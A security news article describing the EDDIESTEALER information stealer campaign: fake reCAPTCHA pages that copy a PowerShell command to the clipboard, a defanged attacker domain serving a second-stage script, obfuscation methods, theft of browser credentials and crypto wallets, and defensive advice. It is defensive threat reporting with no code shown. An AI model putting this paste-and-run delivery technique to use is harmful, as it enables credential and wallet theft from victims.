New EDDIESTEALER Malware Bypasses Chrome Security

byNour Waazize 2 min read
0

EDDIESTEALER: New Rust-Based Malware Exploits Fake CAPTCHA to Steal Sensitive Data

A sophisticated malware campaign has emerged, distributing a Rust-based information stealer named EDDIESTEALER through deceptive CAPTCHA verification pages. This campaign employs advanced social engineering tactics to trick users into executing malicious code, leading to the theft of credentials, browser data, and cryptocurrency wallet information.

Attack Overview

The attack initiates when users visit compromised websites that display fake CAPTCHA challenges resembling Google's reCAPTCHA. These pages instruct users to:

  • Press Windows Key + R to open the Run dialog.

  • Press Ctrl + V to paste a command.

  • Press Enter to execute the command.

Unbeknownst to the user, the website has already copied a malicious PowerShell command to the clipboard using JavaScript's document.execCommand("copy"). Executing this command downloads and runs a secondary script, gverify.js, from an attacker-controlled domain (hxxps://llll.fit/version/). This script then retrieves the final EDDIESTEALER payload, saving it with a pseudorandom 12-character filename.

Technical Details

  • Language & Obfuscation: EDDIESTEALER is written in Rust, leveraging the language's features for stealth and efficiency. It employs XOR-encrypted strings, stripped function symbols, and custom API resolution to hinder analysis.

  • Execution Flow:

    • The initial PowerShell command downloads gverify.js.

    • gverify.js executes in a hidden window using cscript, fetching the EDDIESTEALER executable.

    • The malware then exfiltrates sensitive data, including browser credentials and cryptocurrency wallet details. 

Targeted Data

EDDIESTEALER focuses on extracting:

  • Browser Data: Credentials, cookies, and autofill information from browsers like Chrome, Edge, and Firefox.

  • Cryptocurrency Wallets: Data from browser-based wallets such as MetaMask, Coinbase Wallet, and Trust Wallet.

The malware's ability to bypass Chrome's App-Bound Encryption enhances its effectiveness in stealing sensitive information.

Broader Context

This campaign is part of a growing trend where cybercriminals use fake CAPTCHA pages to distribute malware. Similar tactics have been observed with other malware families like Lumma Stealer and Vidar, indicating a shift towards social engineering methods that exploit user trust in familiar verification processes.

Protection Measures

To defend against such threats:

  • User Awareness: Educate users to be cautious of CAPTCHA pages that prompt unusual actions, such as executing commands via the Run dialog.

  • Restrict PowerShell Access: Limit the ability of standard users to execute PowerShell scripts.

  • Endpoint Security: Deploy security solutions capable of detecting and blocking obfuscated scripts and unauthorized data exfiltration.

  • Regular Updates: Keep browsers and security software up to date to mitigate known vulnerabilities.


Labels:

Post a Comment

Previous Post Next Post